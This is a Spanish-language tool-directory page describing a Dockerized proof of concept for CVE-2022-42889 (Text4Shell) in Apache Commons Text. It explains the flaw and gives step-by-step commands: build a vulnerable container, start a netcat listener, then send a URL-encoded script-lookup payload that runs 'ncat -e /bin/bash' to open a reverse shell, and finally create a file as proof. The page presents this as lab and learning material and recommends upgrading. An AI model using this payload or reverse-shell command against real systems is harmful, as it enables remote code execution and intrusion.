Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-42889-POC — Una aplicación dockerizada simple que muestra cómo explotar la vulnerabilidad CVE-2022-42889. | Kitploit
Herramientas/GitHubGitHub/akshayithape-devops/cve-2022-42889-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónDesarrollo de PayloadsLabs y Práctica
GitHubakshayithape-devops/cve-2022-42889-poc

CVE-2022-42889-POC

Una aplicación dockerizada simple que muestra cómo explotar la vulnerabilidad CVE-2022-42889.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
51hace 3 añosAún no revisado

CVE-2022-42889-POC

Prueba de concepto para la vulnerabilidad de Apache commons-text CVE-2022-42889.

¿Cuál es el problema? :

Apache Commons Text realiza interpolación de variables, permitiendo que las propiedades se evalúen y expandan dinámicamente. El formato estándar para la interpolación es "${prefix:name}", donde "prefix" se utiliza para localizar una instancia de org.apache.commons.text.lookup.StringLookup que realiza la interpolación. A partir de la versión 1.5 y hasta la 1.9, el conjunto de instancias Lookup por defecto incluía interpoladores que podían resultar en ejecución de código arbitrario o contacto con servidores remotos. Estos lookup son: - "script" - ejecuta expresiones usando el motor de ejecución de scripts de la JVM (javax.script) - "dns" - resuelve registros DNS - "url" - carga valores desde URLs, incluyendo desde servidores remotos Las aplicaciones que usan los valores predeterminados de interpolación en las versiones afectadas pueden ser vulnerables a ejecución remota de código o contacto no intencional con servidores remotos si se usan valores de configuración no confiables.

Versiones afectadas :

Apache Commons Text Versión 1.5 a 1.9

Guía paso a paso para mostrar la vulnerabilidad CVE-2022-42889-POC :

1. Construir la aplicación usando Docker (Terminal Pestaña 1)

root@kitploit:~
docker build --tag=test/text4shell .

2. Ejecutar la aplicación (Terminal Pestaña 2)

root@kitploit:~
docker run -it -p 80:8080 --name text4shell test/text4shell

3. Abrir una nueva pestaña de terminal y ejecutar el siguiente comando (Terminal Pestaña 3)

root@kitploit:~
docker exec -it text4shell /bin/bash

4. Ahora es momento de iniciar el listener para la reverse shell en su sistema local (Terminal Pestaña 4)

root@kitploit:~
nc -nlvp 8888

5. Probar la aplicación (Terminal Pestaña 5)

root@kitploit:~
curl http://localhost/text4shell/attack?search=<anything>

6. Ahora es momento de probar el ataque (Terminal Pestaña 5)

El ataque se puede realizar pasando una cadena "${prefix:name}" donde el prefijo es el lookup mencionado: ${script:javascript:java.lang.Runtime.getRuntime().exec('ncat -e /bin/bash 172.17.0.1 8888')}

root@kitploit:~
curl http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27ncat%20-e%20%2Fbin%2Fbash%20172.17.0.1%208888%27%29%7D

7. Luego vaya a la Terminal Pestaña 3 y ejecute los siguientes comandos uno por uno

root@kitploit:~
pwd
cd /root
pwd
ls

8. Luego vaya a la Terminal Pestaña 5 y ejecute los siguientes comandos uno por uno

root@kitploit:~
pwd
cd /root
pwd
ls
touch hacked.txt
ls

9. Luego vaya a la Terminal Pestaña 3 y ejecute los siguientes comandos uno por uno

root@kitploit:~
pwd
ls

Si puede ver el archivo hacked.txt en la Terminal Pestaña 3 después del comando ls, el ataque se ha ejecutado.

10. Cerrar todas las terminales

Cómo solucionar esta vulnerabilidad :

Se recomienda a los usuarios actualizar a Apache Commons Text 1.10.0, que deshabilita los interpoladores problemáticos de forma predeterminada.

Más información :

  • NVD-NIST
Descargar herramienta